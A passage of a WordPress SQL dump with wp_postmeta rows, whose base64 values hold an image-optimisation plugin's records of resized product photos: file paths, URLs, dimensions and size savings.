INSERT INTO `wp_postmeta` VALUES (29367, 1636, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVyMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjIuanBnIiwid2lkdGgiOjQwNjIsImhlaWdodCI6MjcwOCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2Nzg2NiwiaWQiOiIxNjM2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXIyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVyMi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY0NiwidGltZSI6MTQ4MzU2Nzg2OSwiaWQiOjE2MzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVyMi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXIyLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjo5MTEsInRpbWUiOjE0ODM1Njc4NzMsImlkIjoxNjM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjItNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXIyLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVyMi03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6OTIwLCJ0aW1lIjoxNDgzNTY3ODc3LCJpZCI6MTYzNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXIyLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjItMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjItMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MjQxNSwidGltZSI6MTQ4MzU2Nzg4MiwiaWQiOjE2MzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVyMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXIyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MDksInRpbWUiOjE0ODM1Njc4ODUsImlkIjoxNjM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXIyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVyMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDk1LCJ0aW1lIjoxNDgzNTY3ODg4LCJpZCI6MTYzNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXIyLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVyMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU2NiwidGltZSI6MTQ4MzU2Nzg5MiwiaWQiOjE2MzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVyMi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXIyLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo5MDgsInRpbWUiOjE0ODM1Njc4OTUsImlkIjoxNjM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVyMi0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjItMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXIyLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo2NjcsInRpbWUiOjE0ODM1Njc4OTksImlkIjoxNjM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVyMi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjItMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXIyLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo5ODIsInRpbWUiOjE0ODM1Njc5MDIsImlkIjoxNjM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVyMi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcjItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXIyLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDk5LCJ0aW1lIjoxNDgzNTY3OTA2LCJpZCI6MTYzNn1d'); 
INSERT INTO `wp_postmeta` VALUES (29368, 1635, 'wpfc_optimisation_reduction', '333735'); 
INSERT INTO `wp_postmeta` VALUES (29369, 1635, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lcjIuanBnIiwid2lkdGgiOjQyNDAsImhlaWdodCI6MjgzMiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lcjIuanBnIiwicmVkdWN0aW9uIjozMzM3MjQsInRpbWUiOjE0ODM1Njc5MTcsImlkIjoiMTYzNSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyMi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lcjItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXIyLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3OTIwLCJpZCI6MTYzNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXIyLTgwMHg1MzQuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyMi04MDB4NTM0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lcjItODAweDUzNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc5MjMsImlkIjoxNjM1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lcjItNzY4eDUxMy5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXIyLTc2OHg1MTMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyMi03Njh4NTEzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzkyNiwiaWQiOjE2MzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyMi0xNjAweDEwNjkuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXIyLTE2MDB4MTA2OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXIyLTE2MDB4MTA2OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc5MzAsImlkIjoxNjM1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lcjItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXIyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyMi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzkzMywiaWQiOjE2MzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyMi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lcjItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXIyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3OTM1LCJpZCI6MTYzNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXIyLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lcjItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc5MzgsImlkIjoxNjM1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lcjItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXIyLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyMi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2Nzk0MSwiaWQiOjE2MzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXIyLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyMi0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lcjItMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc5NDMsImlkIjoxNjM1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyMi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lcjItMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXIyLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3OTQ2LCJpZCI6MTYzNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lcjItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXIyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyMi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2Nzk0OCwiaWQiOjE2MzV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29370, 1634, 'wpfc_optimisation_reduction', '10875'); 
INSERT INTO `wp_postmeta` VALUES (29371, 1634, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLmpwZyIsIndpZHRoIjo1MzM3LCJoZWlnaHQiOjM1NTgsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1Njc5NTMsImlkIjoiMTYzNCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1NzcsInRpbWUiOjE0ODM1Njc5NTcsImlkIjoxNjM0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lci04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lci04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lci04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTA0NSwidGltZSI6MTQ4MzU2Nzk2MCwiaWQiOjE2MzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY